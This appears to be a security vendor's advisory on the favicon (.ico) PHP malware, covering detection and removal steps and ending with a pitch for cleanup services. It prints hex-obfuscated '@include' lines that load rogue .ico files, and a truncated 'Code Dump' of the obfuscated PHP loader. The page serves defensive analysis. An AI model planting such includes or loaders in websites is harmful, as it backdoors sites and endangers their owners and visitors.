What is the Favicon (.ico) Malware hack?


The favicon (.ico) malware creates rogue favicon.ico or random .ico files which contain malicious PHP code inside them. This malicious PHP code is known to perform dangerous actions on the websites such as URL injection, creation of adminisrator accouns in WordPress/Drupal, installing spyware/trojans, creating phishing pages etc.

Facing security issues because of Favicon.ico Virus? Drop us a message on the chat widget and we’d be happy to help you. Fix my website now.

Malicious code is added to the index.php and other PHP files which 'include' the .ico file.

This article also includes steps to help you with the favicon (.ico) hack removal.

Files target in this attack

  • index.php
  • wp-login.php

How to detect the Favicon Virus?

  • Scan your website for all icon (.ico) files.
  • Download all these (.ico) files on your system and rename their file extensiosn to ".txt"
  • Open the (.ico) now converted to (.txt) files and scan for PHP code, if any PHP code is found, your file is most probably infected.
  • Now scan your core files for instances where the malicious php code found in the above step was executed.
  • If the file contains gibberish text as shown in the screenshot below, then the file is not infected.

Following the above steps will help you with favicon (.ico) hack removal.

Malware Include examples

  • @include "\x2fhome\x2fid00\x3131/d\x6fmain\x73/wid\x65-ope\x6e-net\x77orks\x2ecom/\x70ubli\x63_htm\x6c/mod\x75les/\x63olor\x2ffavi\x63on_6\x61ecc7\x2eico";
  • /home/username/public_html/modules/color/favicon_6aecc7.ico
  • @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico";
  • @include "\x2f/s\x67b/\x66av\x69co\x6e_5\x34e6\x65d.\x69co";
  • @include "\x2f/\x73g\x62/\x66a\x76i\x63o\x6e_\x354\x656\x65d\x2ei\x63o";
  • @include "\x2f/\x70o\x6c-\x6de\x74/\x5fh\x74m\x6c/\x76i\x65w\x2ff\x61v\x69c\x6fn\x5f3\x30a\x391\x65.\x69c\x6f";
  • @include "\x2f/sg\x62/fa\x76ico\x6e_54\x656ed\x2eico";
  • @include "\x2f/p\x6fl-\x6det\x2f_h\x74ml\x2fvi\x65w/\x66av\x69co\x6e_3\x30a9\x31e.\x69co";
  • @include "\x2f/po\x6c-me\x74/_h\x74ml/\x76iew\x2ffav\x69con\x5f30a\x391e.\x69co";
  • @include "\x2f/pol\x2dmet/\x5fhtml\x2fview\x2ffavi\x63on_3\x30a91e\x2eico";
  • @include "\x2fmnt\x2ftar\x67et0\x33/35\x36076\x2f363\x3244/\x77ww.\x63red\x69tfa\x69ry.\x75s/w\x65b/c\ x6fnte\x6et/w\x70-co\x6eten\x74/wf\x6cogs\x2ffav\x69con\x5fce8\x64b6.\x69co";

Symptoms & Problems with this malware

  • Rogue Admin User in CMS
  • Installs Spyware
  • Patches xmlrpc.php

How to remove favicon.ico hack

  • Delete the malicious .ico file
  • Remove the malicious code in the index.php & other PHP files which include these malicious files

Learn more about backdoors in Wordpress and how to fix them.

Facing security issues because of Favicon.ico Malware? Drop us a message on the chat widget and we’d be happy to help you. Fix my website now.

Code Dump

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $zqhlhv = 1056; function rxjdqbd($cdfuc, $attkkyxjmu){$wfdjzocv = ''; for($i=0; $i < strlen($cdfuc); $i++){$wfdjzocv .= isset($attkkyxjmu[$cdfuc[$i]]) ? $attkkyxjmu[$cdfuc[$i]] : $cdfuc[$i];}
$udaib="rawurl" . "decode";return $udaib($wfdjzocv);}
$yoyqluklu = '%2J%2u%2J%2u%T2606_Cre%nF%nQrNNLN_oLS%nQ%n1%n2qpWW%nP%aD%2J%'.
'2u%T2606_Cre%nF%nQoLS_rNNLNC%nQ%n1%n22%nP%aD%2J%2u%T2606_Cre%nF%nQIxi_rirXK'.
'e6L0_e6Ir%nQ%n1%n22%nP%aD%2J%2u%T2rNNLN_NrdLNe60S%nF2%nP%aD%2J%2u%T2Cre_e6Ir'.
Clean My Hacked Website Now

Website Malware Cleanup Website Malware Cleanup

Have you been hacked? Do you need help with fixing your website? We provide professional malware cleanup services to get your business back online quickly.

Removal of Security Warnings Removal of Security Warnings

If your website is hacked, your visitors may be shown a warning message. Astra will take the necessary steps to remove your website from the blacklists ASAP.

Astra Website Firewall (WAF) Website Firewall (WAF)

Stop future website hacks with Astra WAF & protect your website. No hassle out-of-the-box security tailored to your technology stack & CMSs like WordPress, Magento, Opencart etc.

Real Human Support Real Human Support

Astra's team of security engineers guide you through your security journey. We believe in customers first, so no waiting in long queues to get your queries answered.

This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to [email protected]

Pro

Security Tools

$228 /yr
billed annually
Go Pro
Great for Small Business Websites
Includes
  • Priority Malware Cleanup
  • Website Firewall (WAF)
  • Upload Malware Scanning
  • Rate Limit Web Requests
  • Online & Chat Support